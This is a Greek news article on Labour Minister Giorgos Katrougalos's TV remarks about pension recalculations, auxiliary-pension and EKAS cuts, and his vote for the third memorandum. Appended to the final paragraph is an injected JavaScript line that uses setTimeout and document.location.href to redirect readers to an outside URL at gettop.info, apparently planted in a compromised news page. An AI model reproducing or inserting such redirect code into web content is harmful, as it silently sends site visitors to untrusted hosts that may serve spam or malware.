Κατρούγκαλος: Το τρίτο μνημόνιο ήταν ένας αναγκαστικός συμβιβασμός

0
9

 

             «Ο νόμος λέει ρητά ότι όχι στα ποσά προ των μνημονιακών περικοπών, αλλά στα νυν καταβαλλόμενα ποσά ισχύει η «προστασία» των συντάξεων μέχρι τα 1.300 ευρώ», είπε μιλώντας στην πρωινή εκπομπή του ΑΝΤ1 ο υπουργός Εργασίας Γιώργος Κατρούγκαλος.

Όπως υπογράμμισε, «όποιος σήμερα παίρνει ως 1.300 ευρώ, ως άθροισμα κύριας κι επικουρικής σύνταξης, δεν θα υπάρξει μείωση της επικουρικής. Αν και όπου γίνει λάθος θα διορθωθεί. Γι΄ αυτό στέλνουμε σε κάθε συνταξιούχο που είχε περικοπή, μια αναλυτική περιγραφή για το τι συνέβη. Σε αυτό το χαρτί θα τους λέμε πόσα έπαιρνε, πόση περικοπή υπέστη και σε ποιο ύψος θα είναι πλέον οι αποδοχές τους».

Όπως προσέθεσε ο κ. Κατρούγκαλος «ο επανϋπολογισμός των συντάξεων γίνεται με βάση τον συντάξιμο μισθό και όχι το ποσό της σύνταξης», σημειώνοντας ότι «μειώσεις θα υποστεί συνολικά περίπου 1 στους 4 που παίρνουν επικουρική και 1 στους 10 από το σύνολο των συνταξιούχων».

«Κάθε οριζόντια μείωση είναι αντισυνταγματική. Όταν έπρεπε να γίνουν οι αλλαγές, κάναμε έναν νέο τρόπο υπολογισμού σύνταξης, που βασίζεται στην βασική αρχή της ισονομίας. Αυτά τα χρήματα έχουμε, αυτά μπορούμε να δώσουμε, δεν πρέπει να έχουμε διαφορετικών κατηγοριών συνταξιούχους», υπογράμμισε ο υπουργός σύμφωνα με το antenna.gr

Αναφορικά με το «μαχαίρι» του ΕΚΑΣ υπογράμμισε: «Η περικοπή του ΕΚΑΣ ήταν άδικη, δεν ήταν κομμάτι της μεταρρύθμισης. Μας ζητήθηκε από τον Ιούνιο, ψηφίστηκε και από ΝΔ και από ΠΑΣΟΚ κι εμείς βάλαμε στην θέση του, ως αντίβαρο, την εθνική σύνταξη».

Ερωτηθείς για τα 950 εκατομμύρια ευρώ που, βάσει μνημονίου, πρέπει να κοπούν από τις δαπάνες για την κοινωνική πολιτική, ο κ. Κατρούγκαλος απάντησε ότι η δαπάνη για το «εγγυημένο εισόδημα» θα είναι πολύ υψηλότερη, συμπληρώνοντας «διαπραγματευόμαστε με τους δανειστές, να μπορούμε να χρησιμοποιήσουμε ένα κομμάτι από το ποσό των σημερινών επιδομάτων, για να κάνουμε όσο μεγαλύτερη επιδοματική πολιτική γίνεται».

Απαντώντας στο «γιατί ψήφισε το τρίτο μνημόνιο;» τόνισε «εγώ Αριστερός ήμουν και Αριστερός έμεινα», είπε ο κ. Κατρούγκαλος, . Είπε ότι το «τρίτο μνημόνιο ήταν ένας αναγκαστικός συμβιβασμός», συμπληρώνοντας ότι «η ασφαλιστική μεταρρύθμιση έγινε για να εξουδετερώσουμε ότι κακό υπήρχε μέσα στο μνημόνιο, με όρους ισονομίας και κοινωνικής δικαιοσύνης».

Η κράτηση της εισφοράς υγείας 6% γινόταν όχι στα καταβαλλόμενα, αλλά στα προ μνημονιακών περικοπών ποσά, πλέον όμως αυτή η κράτηση θα γίνεται επί του καταβαλλόμενου ποσού, είπε ο κ. Κατρούγκαλος, σημειώνοντας ότι «είναι μόνο 251.000 δικαιούχοι είναι εκείνοι που παίρνουν δύο κύριες συντάξεις και θα επιβαρυνθούν, καθώς μέχρι τώρα ίσχυε μόνο για όσους παίρνουν μία κύρια σύνταξη η εν λόγω κράτησης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here